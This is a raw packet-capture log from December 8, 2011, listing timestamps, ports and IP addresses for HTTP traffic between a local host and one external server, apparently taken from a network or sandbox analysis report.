Dec 8, 2011 14:53:30.585108042 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.585123062 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.585371971 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.586098909 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.611028910 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.611398935 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.611413956 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.611764908 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.647629976 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.673839092 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.674315929 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.674330950 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.674593925 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.699733973 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.764745951 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.765362978 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.765377998 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.765748024 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.780293941 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.790851116 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.791279078 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.791294098 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.903214931 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.903399944 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.903631926 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.903646946 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.903737068 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.903974056 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.936616898 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.937061071 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.937073946 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.937163115 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.999191046 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.999759912 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.999778986 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.999871016 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:31.110933065 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.111337900 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:31.111354113 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.139271975 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.139667034 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:31.139682055 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.217602015 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.218008041 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:31.218023062 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:31.413788080 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:32.170098066 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.263475895 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.263845921 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:32.263864994 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.342242002 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.342653036 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:32.342669964 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.368192911 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.368686914 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:32.368700981 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:32.511097908 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:35.919351101 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:35.919372082 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:36.869817972 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:36.988146067 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:36.988745928 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.048562050 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.049038887 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.049055099 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.049303055 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.074551105 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.207882881 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.207895994 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.222574949 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.222976923 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.222990990 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.223241091 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.248506069 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.275005102 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.275727987 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.275742054 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.276040077 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.300928116 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.387283087 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.387707949 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.445933104 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.446342945 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.446768045 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.446783066 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.447037935 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.472304106 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.472311020 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.472801924 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.514595032 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.515032053 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.515047073 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.515117884 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.648313999 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.648327112 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.661541939 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.661911964 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.661926031 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.668044090 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.668473959 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.672580957 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.688008070 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.688518047 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.688530922 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.688781977 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.692429066 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.699204922 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.699656010 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.699668884 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.699918032 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.719062090 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.719069004 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.719486952 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.725276947 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.725646973 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.725660086 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.837115049 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.837688923 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.837704897 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.837974072 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.863145113 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.866724968 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.867116928 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.867130041 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.867377043 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.889672041 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.889678955 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.890093088 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.893138885 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.893260002 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.893524885 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.893537998 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.893630981 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.915936947 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.916049004 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.916310072 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.919698000 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.919864893 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.919871092 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.920090914 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.920337915 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.942514896 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.942955971 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:37.942970037 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:37.943212986 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.019594908 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.021070004 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.021457911 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.021473885 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.021704912 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.047221899 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.047229052 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.047631979 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.063395023 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.063826084 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.063839912 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.064090014 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.067008018 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.067014933 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.067413092 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.089785099 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.090076923 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.090162992 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.090176105 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.090492010 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.090588093 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.193144083 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.193562984 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.193577051 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.193661928 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.219357014 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.219717026 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.219729900 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.273601055 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.273963928 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.296684980 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.299949884 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.300450087 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.300463915 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.300705910 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.342946053 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.357654095 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.358019114 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.358033895 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.383924961 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.384335995 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.384350061 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.384596109 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.398792982 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.410022020 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.410509109 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.410521984 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.410765886 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.413557053 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.425359011 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.425839901 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.425853014 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.426052094 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.427119970 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.436567068 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.436939955 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.436955929 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.440047026 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.440392971 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.465553045 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.466949940 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.467647076 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.468005896 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.468019009 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.468251944 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.468597889 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.468605995 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.468991995 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.469458103 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.469789028 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.469801903 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.493931055 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.494297981 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.494326115 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.494339943 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.494611025 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.494700909 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.558664083 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.562355042 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.649246931 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.649662018 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.649676085 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.649957895 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.654150009 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.654156923 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.654597998 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.654701948 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.680207014 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.760560989 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.760981083 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.760996103 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.761221886 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.812383890 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.838617086 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.838845968 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.838861942 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.849030972 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.867062092 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.886723042 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.887115955 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.887131929 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.893246889 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.893645048 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.893659115 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.893831968 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.957815886 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.984148026 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.984522104 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.984538078 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:38.984838009 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:38.997536898 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.010756969 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.011149883 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.011162043 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.011404991 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.028698921 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.037338018 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.037731886 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.037744999 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.038062096 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.063354015 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.089610100 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.089992046 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.090004921 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.115775108 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.116157055 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.116169930 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.116461039 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.121876955 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.142225981 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.142642021 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.142653942 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.142959118 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.145559072 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.179416895 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.179799080 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.179811001 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.179835081 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.180147886 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.180366993 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.180377960 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.180764914 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.195022106 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.235548019 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.235797882 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.235815048 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.235963106 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.247214079 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.258610964 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.258826971 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.258841991 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.258995056 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.269526958 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.278548002 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.278846979 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.278861046 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.278956890 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.279074907 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.279088020 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.279201984 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.298046112 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.298094988 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.298371077 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.298383951 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.298410892 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.313846111 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.314166069 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.314177990 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.314383984 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.314397097 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.330641031 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.331027985 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.331039906 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.331219912 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.335658073 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.335843086 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.335935116 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.336266041 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.336280107 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.336932898 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.358396053 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.358947039 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.359293938 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.359308958 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.359529018 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.361733913 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.386248112 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.386624098 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.386639118 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.386699915 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.388433933 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.388784885 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.388797998 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.389012098 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.453943968 CET 80 1064 46.45.137.206 192.168.0.13
